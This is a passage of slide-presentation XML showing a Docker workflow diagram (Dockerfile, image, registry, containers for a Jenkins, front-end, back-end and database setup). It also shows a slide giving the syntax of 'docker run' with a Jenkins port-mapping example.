        <p:nvPicPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7157717" y="622169"/>
            <a:ext cx="650483" cy="585937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119725" y="145100"/>
            <a:ext cx="9951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FrontApp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010463" y="165625"/>
            <a:ext cx="9450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Back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>App</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2479513" y="3536950"/>
            <a:ext cx="2115300" cy="6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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS Image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1115" name="Google Shape;1115;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7952142" y="622179"/>
            <a:ext cx="650483" cy="585914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1116" name="Google Shape;1116;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6981" l="0" r="4104" t="9906"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7390001" y="1747035"/>
            <a:ext cx="1236874" cy="1088759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1117" name="Google Shape;1117;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6981" l="0" r="4104" t="9906"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6059975" y="2821566"/>
            <a:ext cx="1236874" cy="1088759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1118" name="Google Shape;1118;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6981" l="0" r="4104" t="9906"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7390001" y="2821555"/>
            <a:ext cx="1236874" cy="1088759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1119" name="Google Shape;1119;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="215998" y="241825"/>
            <a:ext cx="1511100" cy="430754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6059975" y="3910325"/>
            <a:ext cx="2394000" cy="1055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700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS containers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;1121;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514425" y="3157242"/>
            <a:ext cx="1269300" cy="73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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an create</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225150" y="3527650"/>
            <a:ext cx="2268900" cy="4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rPr>
              <a:t>https://hub.docker.com</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="454225" y="2246063"/>
            <a:ext cx="1236876" cy="1236876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917359" y="2718125"/>
            <a:ext cx="718800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1904328" y="3010875"/>
            <a:ext cx="730500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1634025"/>
            <a:ext cx="2115300" cy="4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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Registry</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1127" name="Google Shape;1127;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6543550" y="859475"/>
            <a:ext cx="198000" cy="1064400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1128" name="Google Shape;1128;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7482625" y="912825"/>
            <a:ext cx="243000" cy="1011000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1129" name="Google Shape;1129;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8189638" y="961555"/>
            <a:ext cx="54900" cy="1927800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1130" name="Google Shape;1130;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848675" y="165625"/>
            <a:ext cx="9951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Db Server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188895" y="560514"/>
            <a:ext cx="650483" cy="585937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5091200" y="390913"/>
            <a:ext cx="995100" cy="3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1133" name="Google Shape;1133;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506625" y="884075"/>
            <a:ext cx="723900" cy="2126100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Google Shape;1134;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4943900" y="165625"/>
            <a:ext cx="11424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Jenkins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2584825" y="859463"/>
            <a:ext cx="2115300" cy="42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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;p192"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1106" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3571375" y="1236875"/>
            <a:ext cx="13500" cy="789000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1137" name="Google Shape;1137;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036496" y="2969626"/>
            <a:ext cx="1044000" cy="26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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Google Shape;1138;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4037200" y="2996000"/>
            <a:ext cx="945000" cy="26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A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Commit </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1139" name="Google Shape;1139;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4929900" y="3126200"/>
            <a:ext cx="527100" cy="8700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="8B008B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="Google Shape;1140;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691100" y="3074125"/>
            <a:ext cx="1217100" cy="26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A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker login</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1141" name="Google Shape;1141;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677847" y="1923837"/>
            <a:ext cx="357462" cy="423600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1142" name="Google Shape;1142;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7829710" y="1995837"/>
            <a:ext cx="357462" cy="423600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955485" y="3063162"/>
            <a:ext cx="357462" cy="423600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1144" name="Google Shape;1144;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677847" y="3063149"/>
            <a:ext cx="357462" cy="423600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514421" y="2275463"/>
            <a:ext cx="1044000" cy="26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rgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker run</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382200" y="1692475"/>
            <a:ext cx="8520600" cy="26556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SzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -p </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hostport</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>containerport</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tag</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -p </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -d  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="9900FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jenkins</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jenkins</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lts</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684200" y="1096375"/>
